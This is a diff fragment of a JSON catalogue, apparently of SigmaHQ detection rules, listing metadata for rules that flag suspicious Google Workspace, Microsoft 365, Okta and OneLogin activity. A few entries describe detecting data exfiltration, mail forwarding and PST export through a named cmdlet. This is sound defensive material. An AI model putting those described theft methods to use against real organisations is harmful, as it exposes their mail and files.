+ ], + "filename": "gworkspace_application_removed.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "google_workspace", + "refs": [ + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_application_removed.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "ee2803f0-71c8-4831-b48b-a1fc57601ee4", + "value": "Google Workspace Application Removed" + }, + { + "description": "Detects when an API access service account is granted domain authority.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "gworkspace_granted_domain_api_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "google_workspace", + "refs": [ + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "04e2a23a-9b29-4a5c-be3a-3542e3f982ba", + "value": "Google Workspace Granted Domain API Access" + }, + { + "description": "Detects when multi-factor authentication (MFA) is disabled.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/26", + "falsepositive": [ + "MFA may be disabled and performed by a system administrator." 
+ ], + "filename": "gworkspace_mfa_disabled.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "google_workspace", + "refs": [ + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "780601d1-6376-4f2a-884e-b8d45599f78c", + "value": "Google Workspace MFA Disabled" + }, + { + "description": "Detects when an a role is modified or deleted in Google Workspace.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "gworkspace_role_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "google_workspace", + "refs": [ + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "6aef64e3-60c6-4782-8db3-8448759c714e", + "value": "Google Workspace Role Modified or Deleted" + }, + { + "description": "Detects when an a role privilege is deleted in Google Workspace.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "gworkspace_role_privilege_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "google_workspace", + "refs": [ + 
"https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "bf638ef7-4d2d-44bb-a1dc-a238252e6267", + "value": "Google Workspace Role Privilege Deleted" + }, + { + "description": "Detects when an Google Workspace user is granted admin privileges.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/23", + "falsepositive": [ + "Google Workspace admin role privileges, may be modified by system administrators." + ], + "filename": "gworkspace_user_granted_admin_privileges.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "google_workspace", + "refs": [ + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "2d1b83e4-17c6-4896-a37b-29140b40a788", + "value": "Google Workspace User Granted Admin Privileges" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce.\nThis is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_activity_by_terminated_user.yml", + "level": "medium", + "logsource.category": "No 
established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "2e669ed8-742e-4fe5-b3c4-5a59b486c2ee", + "value": "Activity Performed by Terminated User" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "User using a VPN or Proxy" + ], + "filename": "microsoft365_activity_from_anonymous_ip_addresses.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1573" + ] + }, + "uuid": "d8b0a4fe-07a8-41be-bd39-b14afa025d95", + "value": "Activity from Anonymous IP Addresses" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_activity_from_infrequent_country.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + 
"https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1573" + ] + }, + "uuid": "0f2468a2-5055-4212-a368-7321198ee706", + "value": "Activity from Infrequent Country" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_data_exfiltration_to_unsanctioned_app.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1537" + ] + }, + "uuid": "2b669496-d215-47d8-bd9a-f4a45bf07cda", + "value": "Data Exfiltration to Unsanctioned Apps" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence.\nThese IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_from_susp_ip_addresses.yml", + "level": "medium", + "logsource.category": "No established 
category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_from_susp_ip_addresses.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1573" + ] + }, + "uuid": "a3501e8e-af9e-43c6-8cd6-9360bdaae498", + "value": "Activity from Suspicious IP Addresses" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2020/07/06", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_impossible_travel_activity.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_impossible_travel_activity.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "d7eab125-5f94-43df-8710-795b80fa1189", + "value": "Microsoft 365 - Impossible Travel Activity" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_logon_from_risky_ip_address.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + 
"https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "c191e2fa-f9d6-4ccf-82af-4f2aba08359f", + "value": "Logon from a Risky IP Address" + }, + { + "description": "Alert for the addition of a new federated domain.", + "meta": { + "author": "@ionsor", + "creation_date": "2022/02/08", + "falsepositive": [ + "The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider." + ], + "filename": "microsoft365_new_federated_domain_added.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf", + "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", + "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html", + "https://www.sygnia.co/golden-saml-advisory", + "https://o365blog.com/post/aadbackdoor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_new_federated_domain_added.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.003" + ] + }, + "uuid": "42127bdd-9133-474f-a6f1-97b6c08a4339", + "value": "New Federated Domain Added" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware.", + "meta": { + "author": "austinsonger", + "creation_date": "2021/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_potential_ransomware_activity.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + 
"refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ] + }, + "uuid": "bd132164-884a-48f1-aa2d-c6d646b04c69", + "value": "Microsoft 365 - Potential Ransomware Activity" + }, + { + "description": "Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content", + "meta": { + "author": "Sorina Ionescu", + "creation_date": "2022/02/08", + "falsepositive": [ + "PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored." + ], + "filename": "microsoft365_pst_export_alert.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://learn.microsoft.com/en-us/microsoft-365/compliance/alert-policies?view=o365-worldwide", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_pst_export_alert.yml" + ], + "tags": [ + "attack.collection", + "attack.t1114" + ] + }, + "uuid": "18b88d08-d73e-4f21-bc25-4b9892a4fdd0", + "value": "PST Export Alert Using eDiscovery Alert" + }, + { + "description": "Alert when a user has performed an export to a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will detect PST export even if the 'eDiscovery search or exported' alert is disabled in the O365.This rule will apply to ExchangePowerShell usage and from the cloud.", + "meta": { + "author": "Nikita Khalimonenkov", + "creation_date": "2022/11/17", + "falsepositive": [ + "Exporting a PST can be done for legitimate purposes by legitimate sources, but due to the sensitive nature of PST content, it must be monitored." 
+ ], + "filename": "microsoft365_pst_export_alert_using_new_compliancesearchaction.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://learn.microsoft.com/en-us/powershell/module/exchange/new-compliancesearchaction?view=exchange-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml" + ], + "tags": [ + "attack.collection", + "attack.t1114" + ] + }, + "uuid": "6897cd82-6664-11ed-9022-0242ac120002", + "value": "PST Export Alert Using New-ComplianceSearchAction" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/22", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_susp_inbox_forwarding.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_inbox_forwarding.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020" + ] + }, + "uuid": "6c220477-0b5b-4b25-bb90-66183b4089e8", + "value": "Suspicious Inbox Forwarding" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_susp_oauth_app_file_download_activities.yml", + "level": "medium", 
+ "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_oauth_app_file_download_activities.yml" + ], + "tags": [ + "attack.exfiltration" + ] + }, + "uuid": "ee111937-1fe7-40f0-962a-0eb44d57d174", + "value": "Suspicious OAuth App File Download Activities" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported a user has deleted a unusual a large volume of files.", + "meta": { + "author": "austinsonger", + "creation_date": "2021/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_unusual_volume_of_file_deletion.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "78a34b67-3c39-4886-8fb4-61c46dc18ecd", + "value": "Microsoft 365 - Unusual Volume of File Deletion" + }, + { + "description": "Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email.", + "meta": { + "author": "austinsonger", + "creation_date": "2021/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_user_restricted_from_sending_email.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + 
"https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1199" + ] + }, + "uuid": "ff246f56-7f24-402a-baca-b86540e3925c", + "value": "Microsoft 365 - User Restricted from Sending Email" + }, + { + "description": "Detects when an the Administrator role is assigned to an user or group.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Administrator roles could be assigned to users or group by other admin users." + ], + "filename": "okta_admin_role_assigned_to_user_or_group.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "413d4a81-6c98-4479-9863-014785fd579c", + "value": "Okta Admin Role Assigned to an User or Group" + }, + { + "description": "Detects when a API token is created", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_api_token_created.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_created.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "19951c21-229d-4ccb-8774-b993c3ff3c5c", + "value": "Okta API Token Created" + }, + { + "description": "Detects when a API 
Token is revoked.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_api_token_revoked.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_api_token_revoked.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "cf1dbc6b-6205-41b4-9b88-a83980d2255b", + "value": "Okta API Token Revoked" + }, + { + "description": "Detects when an application is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_application_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "7899144b-e416-4c28-b0b5-ab8f9e0a541d", + "value": "Okta Application Modified or Deleted" + }, + { + "description": "Detects when an application Sign-on Policy is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_application_sign_on_policy_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_application_sign_on_policy_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "8f668cc4-c18e-45fe-ad00-624a981cf88a", + "value": "Okta Application Sign-On Policy Modified or Deleted" + }, + { + "description": "Detects when an attempt at deactivating or resetting MFA.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/21", + "falsepositive": [ + "If a MFA reset or deactivated was performed by a system administrator." + ], + "filename": "okta_mfa_reset_or_deactivated.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "50e068d7-1e6b-4054-87e5-0a592c40c7e0", + "value": "Okta MFA Reset or Deactivated" + }, + { + "description": "Detects when an Network Zone is Deactivated or Deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_network_zone_deactivated_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "9f308120-69ed-4506-abde-ac6da81f4310", + "value": "Okta Network Zone Deactivated or Deleted" + }, + { + "description": "Detects when an Okta policy is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", 
+ "creation_date": "2021/09/12", + "falsepositive": [ + "Okta Policies being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Okta Policies modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "okta_policy_modified_or_deleted.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "1667a172-ed4c-463c-9969-efd92195319a", + "value": "Okta Policy Modified or Deleted" + }, + { + "description": "Detects when an Policy Rule is Modified or Deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_policy_rule_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "0c97c1d3-4057-45c9-b148-1de94b631931", + "value": "Okta Policy Rule Modified or Deleted" + }, + { + "description": "Detects when an security threat is detected in Okta.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_security_threat_detected.yml", + "level": "medium", + 
"logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm", + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_security_threat_detected.yml" + ], + "tags": "No established tags" + }, + "uuid": "5c82f0b9-3c6d-477f-a318-0e14a1df73e0", + "value": "Okta Security Threat Detected" + }, + { + "description": "Detects when unauthorized access to app occurs.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "User might of believe that they had access." + ], + "filename": "okta_unauthorized_access_to_app.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_unauthorized_access_to_app.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "6cc2b61b-d97e-42ef-a9dd-8aa8dc951657", + "value": "Okta Unauthorized Access to App" + }, + { + "description": "Detects when an user account is locked out.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "okta_user_account_locked_out.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "okta", + "refs": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_user_account_locked_out.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": 
"14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a", + "value": "Okta User Account Locked Out" + }, + { + "description": "Detects when an user assumed another user account.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "onelogin_assumed_another_user.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "onelogin", + "refs": [ + "https://developers.onelogin.com/api-docs/1/events/event-resource", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_assumed_another_user.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "62fff148-278d-497e-8ecd-ad6083231a35", + "value": "OneLogin User Assumed Another User" + }, + { + "description": "Detects when an user account is locked or suspended.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/10/12", + "falsepositive": [ + "System may lock or suspend user accounts." + ], + "filename": "onelogin_user_account_locked.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "onelogin", + "refs": [ + "https://developers.onelogin.com/api-docs/1/events/event-resource/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_user_account_locked.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "a717c561-d117-437e-b2d9-0118a7035d01", + "value": "OneLogin User Account Locked" + }, + { + "description": "Before deploying any new asset, change all default passwords to have values consistent with administrative level accounts.\nSigma detects default credentials usage. Sigma for Qualys vulnerability scanner. 
Scan type - Vulnerability Management.\n", + "meta": { + "author": "Alexandr Yampolskyi, SOC Prime", + "creation_date": "2019/03/26", + "falsepositive": [ + "Unknown" + ], + "filename": "default_credentials_usage.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "qualys", + "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/default_credentials_usage.yml" + ], + "tags": "No established tags" + }, + "uuid": "1a395cbc-a84a-463a-9086-ed8a70e573c7", + "value": "Default Credentials Usage" + }, + { + "description": "Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels.\nEnsure that an encryption is used for all sensitive information in transit. 
Ensure that an encrypted channels is used for all administrative account access.\n", + "meta": { + "author": "Alexandr Yampolskyi, SOC Prime, Tim Shelton", + "creation_date": "2019/03/26", + "falsepositive": [ + "Unknown" + ], + "filename": "firewall_cleartext_protocols.yml", + "level": "low", + "logsource.category": "firewall", + "logsource.product": "No established product", + "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/firewall_cleartext_protocols.yml" + ], + "tags": "No established tags" + }, + "uuid": "d7fb8f0e-bd5f-45c2-b467-19571c490d7e", + "value": "Cleartext Protocol Usage" + }, + { + "description": "Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges.\nSigma detects\nEvent ID 4728 indicates a ‘Member is added to a Security Group’.\nEvent ID 4729 indicates a ‘Member is removed from a Security enabled-group’ .\nEvent ID 4730 indicates a ‘Security Group is deleted’.\nThe case is not applicable for Unix OS.\nSupported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP.\n", + "meta": { + "author": "Alexandr Yampolskyi, SOC Prime", + "creation_date": "2019/03/26", + "falsepositive": [ + "Unknown" + ], + "filename": "group_modification_logging.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728", + 
